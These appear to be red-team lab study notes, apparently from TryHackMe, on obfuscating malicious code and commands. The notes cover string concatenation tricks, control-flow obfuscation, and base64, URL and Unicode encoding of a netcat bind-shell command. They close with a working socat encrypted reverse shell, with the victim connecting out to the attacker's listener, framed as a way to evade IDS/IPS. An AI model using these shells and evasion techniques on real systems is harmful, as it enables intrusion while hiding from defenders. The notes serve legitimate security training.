Obfuscation

Malware obfuscation is a technique used by malicious actors to hide or disguise the true nature and functionality of their code, making it more difficult for security software to detect and for cybersecurity experts to analyze

Concatenation

Language	Concatenation Operator
Python	“+”
PowerShell	“+”, ”,”, ”$”, or no operator at all
C#	“+”, “String.Join”, “String.Concat”
C	“strcat”
C++	“+”, “append”

Character	Purpose	Example
Breaks	Break a single string into multiple sub strings and combine them	('co'+'ffe'+'e')
Reorders	Reorder a string’s components	('10'-f'ffee','co')
Whitespace	Include white space that is not interpreted	.( 'Ne' +'w-Ob' + 'ject')
Ticks	Include ticks that are not interpreted	d`own`LoAd`Stri`ng
Random Case	Tokens are generally not case sensitive and can be any arbitrary case	dOwnLoAdsTRing

Obfuscation Method	Purpose
Junk Code	Add junk instructions that are non-functional, also known as a code stubs
Separation of Related Code	Separate related codes or instructions to increase difficulty in reading the program
Stripping Redundant Symbols	Strips symbolic information such as debug information or other symbol tables
Meaningless Identifiers	Transform a meaningful identifier to something meaningless
Implicit Controls	Converts explicit controls instructions to implicit instructions
Dispatcher-based Controls	Determines the next block to be executed during the runtime
Probabilistic Control Flows	Introduces replications of control flows with the same semantics but different syntax
Bogus Control Flows	Control flows deliberately added to a program but will never be executed

Code Flow

Logic Statement	Purpose
if/else	Executes only if a condition is met, else it will execute a different code block
try/catch	Will try to execute a code block and catch it if it fails to handle errors.
switch case	A switch will follow similar conditional logic to an if statement but checks several different possible conditions with cases before resolving to a break or default
for/while loop	A for loop will execute for a set amount of a condition. A while loop will execute until a condition is no longer met.

Example

x = 3
swVar = 1
a = 112340857612345
b = 1122135047612359087
i = 0
case_1 = ["T","d","4","3","3","3","e","1","g","w","p","y","8","4"]
case_2 = ["1a","H","3a","4a","5a","3","7a","8a","d","10a","11a","12a","!","14a"]
case_3 = ["1b","2b","M","4b","5b","6b","c","8b","9b","3","11b","12b","13b","14b"]
case_4 = ["1c","2c","3c","{","5c","6c","7c","8c","9c","10c","d","12c","13c","14c"]
case_5 = ["1d","2d","3d","4d","D","6d","7d","o","9d","10d","11d","!","13d","14d"]
case_6 = ["1e","2e","3e","4e","5e","6e","7e","8e","9e","10e","11e","12e","13e","}"]
 
while(x > 1):
    if(x % 2 == 1):
        x = x * 3 + 1
    else:
        x = x / 2
    if(x == 1):
        For y in case_1:
            Match swVar:
                case1:
                    print(case_1[i])
                    a = 2
                    b = 214025
                    swVar = 2
                case2:
                    print(case_2[i])
                    if(a >10):
                        swVar = 6
                    else:
                        swVar = 3
                case3:
                    print(case_3[i])
                    b = b + a
                    
                    if(b < 10):
                        swVar = 5
                    else:
                        swVar = 4
                case4:
                    print(case_4[i])
                    b -= b
                    
                    swVar = 5
                case5:
                    print(case_5[i])
                    a +=a
                    
                    swVar = 2
                case6:
                    print(case_5[11])
                    print(case_6[i])
                    Break
                i = i + 1

Encode to base64

$ cat input.txt 
> ncat -lvnp 1234 -e /bin/bash
$ base64 input.txt 
> bmNhdCAtbHZucCAxMjM0IC1lIC9iaW4vYmFzaA==

URL Encoding

URL encoding converts certain characters to the form %HH, where HH is the hexadecimal ASCII representation. English letters, period, dash, and underscore are not affected.

One utility that you can easily install on your Linux system is urlencode, by running the command sudo apt install gridsite-clients.

$ urlencode ncat -lvnp 1234 -e /bin/bash 
> ncat%20-lvnp%201234%20-e%20%2Fbin%2Fbash

Escaped Unicode

Some applications will still process your input and execute it properly if you use escaped Unicode

You can use CyberChef to select and configure the Escape Unicode Characters recipe

Search for Escape Unicode Characters
Drag it to the Recipe column
Ensure you a check-mark near Encode all chars with a prefix of \u
Ensure you have a check-mark near Uppercase hex with a padding of 4

If you use the format \uXXXX, then ncat -lvnp 1234 -e /bin/bash becomes:

\u006e\u0063\u0061\u0074\u0020\u002d\u006c\u0076
\u006e\u0070\u0020\u0031\u0032\u0033\u0034\u0020
\u002d\u0065\u0020\u002f\u0062\u0069\u006e\u002f
\u0062\u0061\u0073\u0068

It is clearly a drastic transformation that would help you evade detection, assuming the target system will interpret it correctly and execute it.

Encrypt the Communication Channel

Because an IDS/IPS won’t inspect encrypted data, an attacker can take advantage of encryption to evade detection. Unlike encoding, encryption requires an encryption key.

One direct approach is to create the necessary encryption key on the attacker’s system and set socat to use the encryption key to enforce encryption as it listens for incoming connections. An encrypted reverse shell can be carried out in three steps:

Create the key
Listen on the attacker’s machine
Connect to the attacker’s machine

Firstly, On the AttackBox or any Linux system, we can create the key using openssl.

openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.redteam.thm/O=Red Team THM/C=UK' -nodes -keyout thm-reverse.key -out thm-reverse.crt

The arguments in the above command are:

req indicates that this is a certificate signing request. Obviously, we won’t submit our certificate for signing.
-x509 specifies that we want an X.509 certificate
-newkey rsa:4096 creates a new certificate request and a new private key using RSA, with the key size being 4096 bits. (You can use other options for RSA key size, such as -newkey rsa:2048.)
-days 365 shows that the validity of our certificate will be one year
-subj sets data, such as organization and country, via the command-line.
-nodes simplifies our command and does not encrypt the private key
-keyout PRIVATE_KEY specifies the filename where we want to save our private key
-out CERTIFICATE specifies the filename to which we want to write the certificate request

The above command returns:

Private key: thm-reverse.key
Certificate: thm-reverse.crt

The Privacy Enhanced Mail (PEM) .pem file requires the concatenation of the private key .key and the certificate .crt files. We can use cat to create our PEM file from the two files that we have just created:

cat thm-reverse.key thm-reverse.crt > thm-reverse.pem

Secondly, with the PEM file ready, we can start listening while using the key for encrypting the communication with the client.

socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT

The options that we used are:

-d -d provides some debugging data (fatal, error, warning, and notice messages)
OPENSSL-LISTEN:PORT_NUM indicates that the connection will be encrypted using OPENSSL
cert=PEM_FILE provides the PEM file (certificate and private key) to establish the encrypted connection
verify=0 disables checking peer’s certificate
fork creates a sub-process to handle each new connection.

Thirdly, on the victim system,

socat OPENSSL:10.20.30.1:4443,verify=0 EXEC:/bin/bash

Note that the EXEC invokes the specified program.